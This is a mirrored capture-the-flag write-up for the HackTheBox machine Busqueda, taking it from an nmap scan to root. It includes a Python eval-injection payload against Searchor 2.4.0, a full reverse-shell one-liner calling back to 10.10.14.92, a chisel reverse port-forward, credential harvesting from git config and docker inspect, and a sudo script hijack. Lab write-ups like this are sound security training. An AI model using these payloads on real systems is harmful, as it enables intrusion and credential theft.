Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-09-20 06:11:56 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/HackTheBox/Busqueda.md
ARZ d842bee172
Create Busqueda.md
2023-08-24 23:58:28 +03:00

4.6 KiB
Raw Permalink Blame History

HackTheBox - Busqueda

NMAP

Nmap scan report for 10.10.11.208
Host is up (0.14s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_  256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://searcher.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

Visting the webserver, it redirects to searcher.htb , so let's add this domain in /etc/hosts file

At bottom, we can see the version, Searchor 2.4.0

Searching for exploits realted to Searchror, there's remote code execution (RCE)

Foothold

From the commit in the github repository, we can see eval is being used which will evaluate anything as a valid code or will execute it

', exec("import os;os.system('id')"))#

From here on we can get a shell

', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.92',2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"))#

After having a shell, stabilizing it to get a full tty with python3

Checking if we have ability to execute anything as a root or any other user with sudo -l

Looking at local running services, there's port 3000 open which is running an instance of gitea

But it requires credentials so there's no use of moving there unless we have found credentials

Privilege Escalation (root)

From config file from /var/www/app/.git we can find the password for user cody on gitea which works for svc

With sudo -l we can check what we can run

Running system-checkup.py as a root user, through this script we can run commands like docker-ps, docker-inspect and full-checkup

We can inspect the config file of mysql_db container

sudo -u 'root' /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect --format='{{json .Config}}' mysql_db

On Inpsecting the config file, we'll get both gitea and root mysql user's password

With gitea mysql user we can login to gitea database

Now that we have credentials, we can try logging on gitea by port forwarding port 3000

chisel client 10.10.14.92:3333 R:localhost:3000
chisel server -p 3333 --reverse

Logging in with cody's account, there's nothing there except for the Seracher_site repo which is just the site that we saw at the beginning

Using gitea database password, we can login as the administrator

We have access to the scripts folder having those python scripts, so we can read what system-checkup.py script actually is doing

From the system-checkup.py we can see that it's using subprocess to execute commands which is safe to use for executing system comamnds but if see the full-checkup command, it's using a script named full-checkup.sh and executing it, so we need to create a script named full-checkup.sh and put our reverse shell to get it executed

References